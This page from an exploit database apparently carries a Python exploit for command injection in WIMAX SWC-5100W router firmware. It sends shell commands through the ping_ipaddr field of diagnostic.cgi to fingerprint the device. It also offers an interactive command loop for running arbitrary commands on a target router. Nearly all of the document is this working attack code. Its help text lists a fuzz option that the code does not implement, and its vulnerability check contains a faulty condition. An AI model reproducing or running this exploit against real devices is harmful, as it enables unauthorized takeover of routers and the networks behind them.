Exploit for WIMAX SWC-5100W Remote Command Execution

Name: Exploit for WIMAX SWC-5100W Remote Command Execution
Rating: 5 (99 reviews)
2023-04-06 | CVSS 6.8
## https://sploitus.com/exploit?id=PACKETSTORM:171748
# Exploit Title: WIMAX SWC-5100W Firmware V(1.11.0.1 :1.9.9.4) - Authenticated RCE  
# Vulnerability Name: Ballin' Mada  
# Date: 4/3/2023  
# Exploit Author: Momen Eldawakhly (Cyber Guy)  
# Vendor Homepage: http://www.seowonintech.co.kr/eng/main  
# Version: Bootloader(1.18.19.0) , HW (0.0.7.0), FW(1.11.0.1 : 1.9.9.4)  
# Tested on: Unix  
# CVE : Under registration  
  
import requests  
import random,argparse  
import sys  
from colorama import Fore  
from bs4 import BeautifulSoup  
  
red = Fore.RED  
green = Fore.GREEN  
cyan = Fore.CYAN  
yellow = Fore.YELLOW  
reset = Fore.RESET  
  
argParser = argparse.ArgumentParser()  
argParser.add_argument("-t", "--target", help="Target router")  
argParser.add_argument("-rv", "--reverseShell", help="Obtain reverse shell", action='store_true')  
argParser.add_argument("-tx", "--testExploit", help="Test exploitability", action='store_true')  
  
args = argParser.parse_args()  
target = args.target  
rev = args.reverseShell  
testX = args.testExploit  
  
  
banner = """  
____ ____ ____ ____ ____ ____ ____ _________ ____ ____ ____ ____   
||B |||a |||l |||l |||i |||n |||' ||| |||M |||a |||d |||a ||  
||__|||__|||__|||__|||__|||__|||__|||_______|||__|||__|||__|||__||  
|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/_______\|/__\|/__\|/__\|/__\|  
RCE 0day in WIMAX SWC-5100W  
[ Spell the CGI as in Cyber Guy ]  
"""  
def checkEXP():  
print(cyan + "[+] Checking if target is vulnerable" + reset)  
art = ['PWNED_1EE7', 'CGI AS IN CYBER GUY']  
request = requests.get(url = f"http://{target}/cgi-bin/diagnostic.cgi?action=Apply&html_view=ping&ping_count=10&ping_ipaddr=;echo 'PUTS("+random.choice(art)+")';", proxies=None)  
if request.status_code == 200:  
print(green + "[+] Status code: 200 success" + reset)  
soup = BeautifulSoup(request.text, 'html.parser')   
if soup.get_text(" ").find("PWNED_1EE7") < 0 or soup.get_text(" ").find("CGI AS IN CYBER GUY"):  
print(green + "[+] Target is vulnerable" + reset)  
uname = requests.get(url = f"http://{target}/cgi-bin/diagnostic.cgi?action=Apply&html_view=ping&ping_count=10&ping_ipaddr=;echo+\"<a+id='pwned'>[*] Kernel: `uname+-a` -=-=- [*] Current directory: `pwd` -=-=- [*] User: `whoami`</a>\";")  
soup_validate = BeautifulSoup(uname.text, 'html.parser')  
print(soup_validate.find(id="pwned").text)  
else:  
print(red + "[+] Seems to be not vulnerable" + reset)  
else:  
print(red + "[+] Status code: " + str(request.status_code) + reset)  
  
  
def revShell():  
cmd = input("CGI #:- ")  
while cmd:  
try:  
print(cmd)  
uname = requests.get(url = f"http://{target}/cgi-bin/diagnostic.cgi?action=Apply&html_view=ping&ping_count=10&ping_ipaddr=;echo+\"<a+id='result'>`{cmd}`</a>\";")  
resp = BeautifulSoup(uname.text, 'html.parser')  
print(resp.find(id="result").text)  
if cmd == "exit" or cmd == "quit":  
print(yellow + "[*] Terminating ..." + reset)  
sys.exit(0)  
else:  
return revShell()  
except KeyboardInterrupt:  
sys.exit(0)  
  
def help():  
print(  
"""   
[+] Example: python3 pwnMada.py -t 192.168.1.1 -rv  
  
[*] -t, --target :: Specify target to attack.  
[*] -rv, --reverseShell :: Obtain reverse shell.  
[*] -tx, --testExploit :: Test the exploitability of the target.  
[*] -fz, --fuzz :: Fuzz the target with arbitrary chars.  
"""  
)  
  
if target and rev:  
print(banner)  
revShell()  
elif target and testX:  
print(banner)  
checkEXP()  
else:  
print(banner)  
argParser.print_help()